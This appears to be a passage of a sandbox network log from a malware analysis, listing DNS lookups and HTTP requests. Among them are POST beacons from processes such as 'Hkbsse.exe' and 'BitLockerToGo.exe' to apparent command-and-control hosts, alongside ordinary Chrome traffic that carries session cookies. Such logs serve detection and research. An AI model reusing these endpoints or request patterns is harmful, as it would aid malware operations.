Set-Cookie: PHPSESSID=00mfvo4lvoksv2pquokgvmm9sn; expires=Mon, 21-Oct-2024 07:54:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FjQBBvOnpugpojQM7TaV36Wym9UWkx1FzfxU%2Fo%2F6XYjX2dZipCWo2FbVK7JmaQaAj487LEbKhclZEYfmij2cTbCallsIkY1jwQG5L2dQoKvsrcvZPvfcd81Nkc9bv9g7RTEvGI%2Fscr2r"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89a602096d2e48c9-LHR
alt-svc: h3=":443"; ma=86400
DNS

151.78.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

151.78.21.104.in-addr.arpa

IN PTR

Response
DNS

deadtrainingactioniw.xyz

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

deadtrainingactioniw.xyz

IN A

Response

deadtrainingactioniw.xyz

IN A

104.21.75.31

deadtrainingactioniw.xyz

IN A

172.67.167.4
POST

https://deadtrainingactioniw.xyz/api

BitLockerToGo.exe

Remote address:

104.21.75.31:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: deadtrainingactioniw.xyz

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:08:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=0b5feg4febhskbqvsqjc0a52bt; expires=Mon, 21-Oct-2024 07:54:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BbRa4H7%2FhS4bLJGOQcID93SsQbLaoIHNoFNUM6BMrC%2FHHkmz5MP1w32ZaP2TX0PRkVQrL%2FhYQ7wFgILGN1sVtunwFqZnfjupcB5tFnyiu2TH3N7Rrt2xAuSZZO2GcnYV%2BfiI%2BIS8G9LN53c%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89a6020c5ccb94b5-LHR
alt-svc: h3=":443"; ma=86400
DNS

93.191.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

93.191.67.172.in-addr.arpa

IN PTR

Response
DNS

31.75.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.75.21.104.in-addr.arpa

IN PTR

Response
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

30.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

30.243.111.52.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239351692308_1QYA5IZ7RRGGSDH4Z&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239351692308_1QYA5IZ7RRGGSDH4Z&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 770657
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B9492BBD8D054CD4A162F0D0418E0AA9 Ref B: LON04EDGE1112 Ref C: 2024-06-27T14:09:04Z
date: Thu, 27 Jun 2024 14:09:04 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239370255189_1E7XE0SO5A57SENIS&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239370255189_1E7XE0SO5A57SENIS&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 664406
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9F46FEC6A6DB4CE1BF573C4BB1163D9D Ref B: LON04EDGE1112 Ref C: 2024-06-27T14:09:04Z
date: Thu, 27 Jun 2024 14:09:04 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239370639329_16GDTY03HO5SY2UBG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239370639329_16GDTY03HO5SY2UBG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 276211
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C157B32F3ADE4996841D0C96EACB98F7 Ref B: LON04EDGE1112 Ref C: 2024-06-27T14:09:04Z
date: Thu, 27 Jun 2024 14:09:04 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239370255188_1EKPMYV01DV13G64K&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239370255188_1EKPMYV01DV13G64K&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 682798
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C58BBF1A640847F1B0D59B6F48732479 Ref B: LON04EDGE1112 Ref C: 2024-06-27T14:09:04Z
date: Thu, 27 Jun 2024 14:09:04 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239370639330_1D80T5H13WVAODNQ8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239370639330_1D80T5H13WVAODNQ8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 835660
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 38DDD5E4BBAF4683889683290DD26322 Ref B: LON04EDGE1112 Ref C: 2024-06-27T14:09:04Z
date: Thu, 27 Jun 2024 14:09:04 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239351692309_12E985FV6AZCRM3HV&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239351692309_12E985FV6AZCRM3HV&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 383394
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 19AE62515BB44E5B9811432291CDFACA Ref B: LON04EDGE1112 Ref C: 2024-06-27T14:09:05Z
date: Thu, 27 Jun 2024 14:09:05 GMT
DNS

10.28.171.150.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.28.171.150.in-addr.arpa

IN PTR

Response
DNS

174.117.168.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

174.117.168.52.in-addr.arpa

IN PTR

Response
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

3.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.200.250.142.in-addr.arpa

IN PTR

Response

3.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f31e100net
DNS

234.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.179.250.142.in-addr.arpa

IN PTR

Response

234.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f101e100net
DNS

196.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
DNS

227.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.212.58.216.in-addr.arpa

IN PTR

Response

227.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f31e100net

227.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f3�H

227.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f227�H
DNS

apis.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.200.14
DNS

14.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.200.250.142.in-addr.arpa

IN PTR

Response

14.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f141e100net
DNS

play.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
DNS

238.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.179.250.142.in-addr.arpa

IN PTR

Response

238.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f141e100net
DNS

238.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.187.250.142.in-addr.arpa

IN PTR

Response

238.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f141e100net
POST

http://185.172.128.116/Mb3GvQs8/index.php

Hkbsse.exe

Remote address:

185.172.128.116:80

Request

POST /Mb3GvQs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.116
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:10:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.172.128.116/Mb3GvQs8/index.php

Hkbsse.exe

Remote address:

185.172.128.116:80

Request

POST /Mb3GvQs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.116
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:10:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://o7labs.top/online/support/index.php

Hkbsse.exe

Remote address:

94.228.166.74:80

Request

POST /online/support/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: o7labs.top
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:10:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://o7labs.top/online/support/index.php

Hkbsse.exe

Remote address:

94.228.166.74:80

Request

POST /online/support/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: o7labs.top
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:10:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

99.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.201.58.216.in-addr.arpa

IN PTR

Response

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f31e100net

99.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f3�G

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f99�G
DNS

consent.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

consent.google.com

IN A

Response

consent.google.com

IN A

142.250.187.238
POST

https://consent.google.com/save?continue=https://www.google.com/search?q%3Drreeggaarrddeerr%2Bvviiccee%2Bvveerrssaa%2B22%26oq%3Drreeggaarrddeerr%2B%2Bvviiccee%2B%2Bvveerrssaa%2B%2B22%26aqs%3Dchrome..69i57.10483j0j7%26sourceid%3Dchrome%26ie%3DUTF-8&gl=UK&m=0&pc=srp&x=5&src=2&hl=en&bl=gws_20240625-0_RC5&uxe=none&cm=2&set_eom=false&set_aps=true&set_sc=true

chrome.exe

Remote address:

142.250.187.238:443

Request

POST /save?continue=https://www.google.com/search?q%3Drreeggaarrddeerr%2Bvviiccee%2Bvveerrssaa%2B22%26oq%3Drreeggaarrddeerr%2B%2Bvviiccee%2B%2Bvveerrssaa%2B%2B22%26aqs%3Dchrome..69i57.10483j0j7%26sourceid%3Dchrome%26ie%3DUTF-8&gl=UK&m=0&pc=srp&x=5&src=2&hl=en&bl=gws_20240625-0_RC5&uxe=none&cm=2&set_eom=false&set_aps=true&set_sc=true HTTP/2.0
host: consent.google.com
content-length: 0
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.google.com
x-client-data: CJnuygE=
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: NID=514=pWe5CmtIMg_T5n_47nWv5DMDOK5uY3WZwb8xv_GCTKhuaiA5gwvxFeDd1bFDBlju-awDzWnU814mRGj3nZtF0lNze3XRPtIRvCF65HJsqA5YRtXXchMf9ndHlEjv_nhqorjDBzWl00uV1WA-M2182b7vKfPvYqmj-tMBjtG7DLg
cookie: AEC=AQTF6HyhayuSj5rVCgN50Zjp-ciAZ3vabiplENEoW5qi504-D0MQeub6WaI
cookie: __Secure-ENID=20.SE=UozlaaMI0BCO8w_2_afqEqV_pK2SmiCdDe-MWTRZspSsf_5wUbR3-LH6hMs00_tRw7ucuWnHbOJMhXxNKMkT6xDP8hIAk6WuKfYH2cnDLezzJxB0QsVrRQAPGpgOdBk5NIlPkyB8R8UFMXkwnkjQSrqjmpK46SEnowyLMtc6PtpX-NrLmA1FP6c
cookie: SOCS=CAISHAgCEhJnd3NfMjAyNDA2MjUtMF9SQzUaAmVuIAEaBgiA1_KzBg
DNS

encrypted-tbn0.gstatic.com

chrome.exe

Remote address:

8.8.8.8:53

Request

encrypted-tbn0.gstatic.com

IN A

Response

encrypted-tbn0.gstatic.com

IN A

142.250.178.14
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQAzZI4BECMxe1738aw_ztq7LkvMUaUaKY6FLWtxHq5m7TcaPV6_3kmjrIk2Q&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcQAzZI4BECMxe1738aw_ztq7LkvMUaUaKY6FLWtxHq5m7TcaPV6_3kmjrIk2Q&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQDAmfZ97jPILP5PRHT-mSk27jDPsX2gDOavBUh1S0P&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcQDAmfZ97jPILP5PRHT-mSk27jDPsX2gDOavBUh1S0P&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQLEjUMqU77oQKKc2NGbUC2EAz9Mv2x1ACDuzhT0GgXEQ&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcQLEjUMqU77oQKKc2NGbUC2EAz9Mv2x1ACDuzhT0GgXEQ&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQzC7ZqLtYOSn7EF06ZS4268RboPPdG9860kT8XJzFj&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcQzC7ZqLtYOSn7EF06ZS4268RboPPdG9860kT8XJzFj&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSQ8qb0pZsYkeX9lbWz2AyQfUkY5RsN41FgJJFqjFQ2&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcSQ8qb0pZsYkeX9lbWz2AyQfUkY5RsN41FgJJFqjFQ2&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ8bb4EctsWDMzuHADfYvQ8ejKxjjQm2-jAOxG0qelwAQ&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcQ8bb4EctsWDMzuHADfYvQ8ejKxjjQm2-jAOxG0qelwAQ&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTQnkieI1-lrYgtv_b-9ItBlLKwrN4IMfj7qG3qKGDFmA&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcTQnkieI1-lrYgtv_b-9ItBlLKwrN4IMfj7qG3qKGDFmA&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ4Wq9fAagoHNb9OCVwm1thAdtpk8DxnvmaMwYd0ejxBuSVz-HHuDxThY-tZg&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcQ4Wq9fAagoHNb9OCVwm1thAdtpk8DxnvmaMwYd0ejxBuSVz-HHuDxThY-tZg&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcREMrGkAovJXUqRwCZrZUxHXb9Ogm7eJWjpbm94hk3a9czFWFvLbb303vrIaw&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcREMrGkAovJXUqRwCZrZUxHXb9Ogm7eJWjpbm94hk3a9czFWFvLbb303vrIaw&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
